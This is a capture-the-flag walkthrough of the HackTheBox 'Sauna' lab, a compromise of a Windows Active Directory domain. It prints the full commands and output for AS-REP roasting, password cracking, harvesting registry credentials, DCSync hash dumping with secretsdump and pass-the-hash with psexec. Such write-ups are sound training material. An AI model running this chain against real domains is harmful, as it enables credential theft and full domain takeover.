HackTheBox - Sauna 🔥💥

---

Quick Summary

→ A fun box machine running on Windows with great Active directory on it! The website running on port 80 has given some usernames on abous-us page. I do brute force web directories like I always did on website enumeration but I didn’t find anything. Running enum4linux I find some useful information that will probably help me to get in. Using GetNPUsers I’ve managed to dump user password hash and I crack it with john and grab the user.txt. In privilege escalation part, I use WinPEAS to get find interesting stuffs like credentials or misconfiguration, and I found a autoLogon credentials. To get the root, the machine is vulnerable to DcSync attack, I get the admin hash with secretsdump and with psexec I login as administrator and finally grab the root.txt.

---

Penetration Testing Methodologies

1. Network Scanning

   → Nmap scan

   → discover open ports and what services are running

2. Enumeration

   → visiting the Website looking for possible hint

   → found some possible users on about-us page

3. Post - Exploitation

   → brute force web directories with dirsearch

   → enumerate windows box with enum4linux to get some juicy information

   → list all the users in a text file with name variation

4. Exploitation

   → check if the Kerberos pre-authentication required is not set and doing a asreproast attack

   → using GetNPUSers i’ve manage to dump the user password hash with his username in it.

   → crack the password hash with john

   → Login as FSmith with evil-winrm and grab user.txt

5. Privilege Escalation

   → upload WinPEAS and run to find some juicy info that I can use for privile escalation

   → I found another credentials that is AutoLogon

   → login again as svc_loanmgr user using evil-winrm

   → svc_loanmgr has permission on GetchangesAll so we can perform DcSync Attack

   → grab administrator password hash with secretsdump

   → Login as administrator again using psexec and finally grab the root.txt

---

Network Scanning

Walkthrough

→ I always begin at NMAP to look on the services what is running. I always use

---

• -sV ⇒ Probe open ports to determine service/version info
• -sC ⇒ equivalent to —script=default
• -A- ⇒ Agressive scan
• -oN ⇒ to save our scan results to a text file

---

root in htb/boxes/Sauna 
❯ nmap -sV -sC -T4 -A 10.10.10.175 -oN nmap-Sauna
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 07:17 PST
Nmap scan report for 10.10.10.175
Host is up (0.21s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-03-21 06:21:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/21%Time=5E754F50%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h02m24s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-21T06:23:55
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   211.01 ms 10.10.14.1
2   50.45 ms  10.10.10.175

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 395.18 seconds

root in htb/boxes/Sauna took 6m35s 
❯ 

Nmap results

So there’s a lot of port open. only 3 ports are interesting

• 80 ⇒ which basically a web service
• 88 ⇒ which running on Kerberos
• 5985 ⇒ WinRM

---

Enumeration

The Sauna Website

Since there’s web service I always looking that first

In the website I found a possible list of users in about-us page

---

Post - Exploitation

Enumerationg USERS

I didn’t find anything in the whole website so I decided to brute force the web directories like I always do in web attacking :

root in htb/boxes/Sauna 
❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.175/" -e asd -t 20 --simple-report=sauna-directories

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109

Error Log: /opt/dirsearch/logs/errors-20-03-21_07-40-57.log

Target: http://10.10.10.175/

[07:40:59] Starting: 
[07:41:00] 403 -  312B  - /%2e%2e/google.com
[07:41:52] 301 -  147B  - /css  ->  http://10.10.10.175/css/                                                      
[07:42:08] 301 -  149B  - /fonts  ->  http://10.10.10.175/fonts/                                      
[07:42:18] 301 -  150B  - /images  ->  http://10.10.10.175/images/     
[07:42:18] 301 -  150B  - /Images  ->  http://10.10.10.175/Images/
[07:42:19] 200 -   32KB - /index.html                                                                          
                                                                                                                  
Task Completed

root in htb/boxes/Sauna took 2m15s 
❯ 

Didn’t find anything again so I use enum4linux to find some juicy information in the box :

root in htb/boxes/Sauna 
❯ enum4linux 10.10.10.175
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 21 08:02:10 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.175
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.175    |
 ==================================================== 
[E] Can't find workgroup/domain


 ============================================ 
|    Nbtstat Information for 10.10.10.175    |
 ============================================ 
Looking up status of 10.10.10.175
No reply from 10.10.10.175

 ===================================== 
|    Session Check on 10.10.10.175    |
 ===================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.10.175 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 =========================================== 
|    Getting domain SID for 10.10.10.175    |
 =========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: EGOTISTICALBANK
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
[+] Host is part of a domain (not a workgroup)

 ====================================== 
|    OS information on 10.10.10.175    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.175 from smbclient: 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.175 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================= 
|    Users on 10.10.10.175    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ========================================= 
|    Share Enumeration on 10.10.10.175    |
 ========================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.10.175

 ==================================================== 
|    Password Policy Information for 10.10.10.175    |
 ==================================================== 
[E] Unexpected error from polenum:


[+] Attaching to 10.10.10.175 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: Cannot request session (Called Name:10.10.10.175)

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 501.

[E] Failed to get password policy with rpcclient


 ============================== 
|    Groups on 10.10.10.175    |
 ============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting builtin groups:

[+] Getting builtin group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 542.

[+] Getting local groups:

[+] Getting local group memberships:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 593.

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.10.175 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 710.
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 742.

 ============================================= 
|    Getting printer info for 10.10.10.175    |
 ============================================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 991.
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Sat Mar 21 08:03:39 2020


root in htb/boxes/Sauna took 1m29s 
❯ 

base on the data I got, the machine is running on kerberos and the domain name is EGOTISTICALBANK

I listed all the users that on the about-us page in the website with different name variation :

Fergus.Smith
Fergus.a.Smith
FSmith
fsmith
FaSmith
FeSmith
FeaSmith
Hugo.Bear
Hugo.a.Bear
HBear
HaBear
HuBear
HuaBear
Steven.Kerb
Steven.a.Kerb
SKerb
SaKerb
StKerb
StaKerb
Shaun.Coins
Shaun.a.Coins
SCoins
SaCoins
ShCoins
ShaCoins
Bowie.Taylor
Bowie.a.Taylor
BTaylor
BaTaylor
BoTaylor
BoaTaylor
Sophie.Driver
Sophie.a.Driver
SDriver
SaDriver
SoDriver
SoaDriver

---

Exploitation

Kerberos Pre-Authentication

Now that I have users list my next thing to do is to check if the Kerberos pre-authentication required is not set, and do the asreproast attack

I will grab the AS_REP with GetNpUser.py :

root in htb/boxes/Sauna via 🐍 v2.7.17 
❯ python GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -outputfile result.txt -dc-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

root in htb/boxes/Sauna via 🐍 v2.7.17 took 24s 
❯ ls
GetNPUsers.py nmap-Sauna  payaso.py  result.txt  sauna-directories  users.txt

Now looking at the result I found that user FSmit is vulnerable to ASREProast and I get his password hash :

root in htb/boxes/Sauna via 🐍 v2.7.17 
❯ cat result.txt 
$krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL:8495bdf34711fd79334bb5c80d64fb42$8f7bb2cbd1b7d6010e44b7bd27aa1779beb2bddaffcbbcb395cf8d63b3d94e73028f1f99337ee7279c1feb3f3d89ab816db9be7f60ea7b7c3dd9cd1d71bde16939feb9bd17c72b338abcacf74757de1eb64c042d7d935e3b58244c5e2b916c82e524fb978146a6f6d8a6500125eff93a540568a0d14a70fb0af654820c6ba6819c805637928dfca73778281b012c94ac5dc0efce1b917d4cd9f2dfc2d5997d56e969f7eb44e48fcca182976dfca86784c7a655a847b53cd5d7053c1db06424c2bc2fb3c8c4ebcd012baa2b0e32c5a2a31436d960f390af34db74148a9e40f8dae3ae2be7c98ad547b8403756e61827ba7b98c9fa8c521f4ae50b053da135bcc8
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:fa1c6693421661b8cf10a966cf45ff47$7e2d1bbe52f0798842ecb2a2ed2c0c66d00c3202b79ae4982d860a6d3d00e35cd2fd2ef80c4c9172f494d0978f9d67361e37755a7e762a29b4b7f31165059b360c6b55db0a82ea7ee34ab193a2de0b08a18b77a51d446af15bfbead9ea25c9f291bf347bb0db34279a795615967fa79a2d74e5593f0c6ee4eaa27cc0b7736d15ec7ba61461645f666329e4bf01364d1966a7ff8b941b781bf4d40c0cee65187e2efd54ce99543029459a6587d091c160f06a7e95459b4f59687ef96959ae2d27f7181683bbf1b52fb329c7267d8cc198e5bca02c7ea8171b11e71fec9d85996e4bd5118e0e76ebe61823941c29dc75b3d03da0352b5bd68dc00b0e40b43ee0d7

root in htb/boxes/Sauna via 🐍 v2.7.17 
❯ 

Now that I have the hash it’s time to crack it with john

root in htb/boxes/Sauna via 🐍 v2.7.17 
❯ john result.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
Thestrokes23     ($krb5asrep$23$FSmith@EGOTISTICAL-BANK.LOCAL)
2g 0:00:00:58 DONE (2020-03-21 08:43) 0.03437g/s 181144p/s 362289c/s 362289C/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

root in htb/boxes/Sauna via 🐍 v2.7.17 took 59s 
❯ 

Grab user.txt

I got the user password Thestrokes23 now it’s time use evil-winrm and login as FSmith and grab the user.txt

root in evil-winrm on  master via 💎 v2.5.7 
❯ ruby evil-winrm.rb -i 10.10.10.175 -u FSmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> more user.txt
20b98d97

*Evil-WinRM* PS C:\Users\FSmith\Desktop> 

---

Privilege Escalation

Escalating to svc_loanmgr

upon enumerating the box there’s another user svc_loanmgr

*Evil-WinRM* PS C:\users> ls


    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr

I need to get the user svc_loanmgr but I don’t know what to do next so I decided to run WinPEAS. After running I got his AutoLogon credentials in plain text :

	
  [+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!

	DefaultDomainName				: EGOTISTICALBANK
	DefaultUserName					: EGOTISTICALBANK\svc_loanmanager
	DefaultPassword					: Moneymakestheworldgoround!

so the password is Moneymakestheworldgoround!

We can also get his password with this command reg query HKLM /f password /t REG_SZ /s

*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{29EA1611-529B-4113-8EE3-EE0F6DD2C715}
    (Default)    REG_SZ    RASGCW Change Password Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{3bfe6eb7-281d-4333-999e-e949e3621de7}
    (Default)    REG_SZ    Cert Password UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{9cb233a5-a4a5-46b9-ab13-db07ce949410}
    (Default)    REG_SZ    Password retry UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{d9162b5b-ca81-476e-a310-cb32d932733c}
    (Default)    REG_SZ    Password Expired UI Page

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{2135f72a-90b5-4ed3-a7f1-8bb705ac276a}
    (Default)    REG_SZ    PicturePasswordLogonProvider

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{60b78e88-ead8-445c-9cfd-0b87f74ea6cd}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
    Text    REG_SZ    Prompt for user name and password

Login as svc_loanmanager

So from user FSmith now I will logged in as svc_loanmanager and start enumerating again.

*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> whoami /all

USER INFORMATION
----------------

User Name                   SID
=========================== ==============================================
egotisticalbank\svc_loanmgr S-1-5-21-2966785786-3096785034-1186376766-1108

GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

*Evil-WinRM* PS C:\Users\svc_loanmgr>

No interesting stuffs found. I decided to use BloodHound to get the structure of all domains :

I just found that user svc_loanmgr has permissions to execute DCSync against the DC

So I can abuse this privileges using secretdumps and extract the hash of the Administrator password :

root in impacket/examples on  master via 🐍 v2.7.17 
❯ python secretsdump.py EGOTISTICALBANK/svc_loanmgr@10.10.10.175 -just-dc
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:97d33cc179ece045b9dd8f8ecd61a944:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:c9d865558b9ce09f6589ed79a4f9354c128b168f5b1dfa5712cce47a741e7df2
SAUNA$:aes128-cts-hmac-sha1-96:72c6fee92ba584acb19a4a1d7d2e876c
SAUNA$:des-cbc-md5:da0794d52c5eab5e
[*] Cleaning up... 

root in impacket/examples on  master via 🐍 v2.7.17 took 51s 
❯ 

Now that I got the administrator password hash, we can use psexec to login as administrator :

root in impacket/examples on  master via 🐍 v2.7.17 
❯ python psexec.py EGOTISTICALBANK/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff -target-ip 10.10.10.175
Impacket v0.9.21.dev1+20200305.180336.e0c1b9dd - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.175.....
[*] Found writable share ADMIN$
[*] Uploading file GWcAFdKS.exe
[*] Opening SVCManager on 10.10.10.175.....
[*] Creating service iwyN on 10.10.10.175.....
[*] Starting service iwyN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami & hostname
nt authority\system
SAUNA

C:\Windows\system32>

Grab the root.txt

Now that I’m the admin i can now get the root.txt

C:\Windows\system32>cd \Users\Administrator\Desktop
 
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

01/23/2020  04:11 PM    <DIR>          .
01/23/2020  04:11 PM    <DIR>          ..
01/23/2020  11:22 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,681,822,720 bytes free

C:\Users\Administrator\Desktop>more root.txt
04965c68

C:\Users\Administrator\Desktop>

---

If you liked my writeup please leave a respect on my Profile

---

Referrences:

ASREProast

GetNPUsers

BloodHound

WinPEAS

secretsdumps